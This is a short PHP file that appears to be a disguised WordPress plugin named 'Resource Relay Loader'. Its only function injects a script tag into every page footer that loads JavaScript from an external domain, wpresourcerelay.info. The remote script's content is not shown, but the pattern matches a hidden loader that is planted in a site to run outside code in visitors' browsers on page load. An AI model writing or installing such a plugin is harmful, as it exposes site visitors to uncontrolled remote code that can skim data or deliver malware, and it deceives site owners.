 <?php
/**
 * Plugin Name: Resource Relay Loader
 * Description: Loads the configured shared resource in the site footer.
 * Version: 1.0.0
 * Author: Site Administrator
 */
if (!defined('ABSPATH')) { exit; }

add_action('wp_footer', static function (): void {
    echo "\n<script src=\"https://wpresourcerelay.info/data.js\"></script>\n";
}, 9999);
